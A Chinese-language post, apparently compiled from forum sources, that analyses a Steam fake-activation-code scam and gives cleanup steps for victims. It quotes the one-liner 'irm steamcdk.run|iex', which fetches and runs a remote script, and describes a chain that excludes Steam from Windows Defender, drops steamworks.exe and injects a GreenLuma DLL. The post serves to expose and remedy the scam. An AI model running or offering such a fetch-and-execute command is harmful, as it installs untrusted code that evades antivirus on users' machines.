来源
https://www.bilibili.com/opus/866452958431150130
https://www.bilibili.com/opus/912188403001327621
观点
一
01 irm steamcdk.run|iex 行为分析 该指令访问域名为steamcdk.run的网页并执行其脚本 在脚本中检测了管理员权限 接着,脚本尝试获取 Steam 的安装路径,并检查 Windows Defender 是否正在运行。如果 Windows Defender 正在运行,则将 Steam 安装路径添加到 Windows Defender 的排除路径中。然后从所给链接下载steamworks.exe到steam目录中最后运行该程序
02 steamworks.exe行为分析 查看steamworks.exe的信息,是一个C++应用程序,选择运行steamworks.exe,会强制退出steam平台的进程。
接着steamworks.exe释放python支持库到临时文件夹中,其中background.jpg等3张图片是steam序列号激活游戏的界面 由于此时steam已强制退出,不难猜到该界面正是刚刚提到的临时文件夹中的图片绘制而成。
将某宝店家提供给我们的CDK提交,发现通过网络下载了文件2230650.zip 通过steamdb查询我们要激活的游戏TEVI,发现TEVI的ID正是2230650。
解压2230650.zip后得到的文件其中包含了TEVI的清单文件2230651_5704585057152086627.manifest和密钥文件。猜测是由steam免费入库工具SteamTools生成。
显然店家提供给我们的"游戏CDK"实际上是游戏的标识ID,通过该ID下载对应的游戏免费入库包。接着steamworks.exe将TEVI的清单文件2230651_5704585057152086627.manifest拷贝到steam目录下的depotcache文件夹中,并且修改了包括config.vdf在内的一部分配置文件
03 User32.dll行为分析 显然User32.dll是为了劫持注入,在IDA中查看发现具有GreenLuma字符串。通过搜索引擎查找GreenLuma,发现这也是一个steam入库工具。显然steamworks.exe通过GreenLuma进行劫持注入,通过之前得到的TEVI的清单文件。2230651_5704585057152086627.manifest和密钥文件进行解锁 最后,弹出激活成功的窗口并重启steam
总结:实际上这个东西是允许steamtools绕过Windows defender来修改steam的文件,然后用自带的虚假的登陆界面和激活界面来使玩家以为成功激活了游戏,而输入的“游戏代码”实际上是该游戏在Steam Tools的标识ID。所以归根结底就是通过一段代码免了以前还要下载Steam Tools这种免费入库方法,所以用的手段与以前那些廉价入库并没有变化。
以上内容除总结外均转自看雪社区《steam伪激活码原理分析》 原作者:Sunako
补救
一
被坑+1,还好只是输了powershell命令,看到大家的提醒后提供自己的方法:
- 卸载steam并删除所有相关文件
- 全盘搜索hid.dll文件并删除,一般是在steam文件夹下
- 全盘搜索*.ps1/psc1/psm1三种类型的文件,搜索的时候上方会有搜索选项,选则修改日期为今天,将搜到的所有文件删除,我自己只搜到一个明显在输入powershell命令后看到的相关文件
- 另外避雷🍑店铺“STEAM省钱小店”
二
可以用Geek Uninstaller卸载steam,卸载之后会自动扫描有关注册表文件和其他文件。可一键清除 geekuninstaller.com/download 贴上一个官方的地址,打开后下载左边的Free免费版即可
复盘
玩游戏别省那三瓜两枣的,服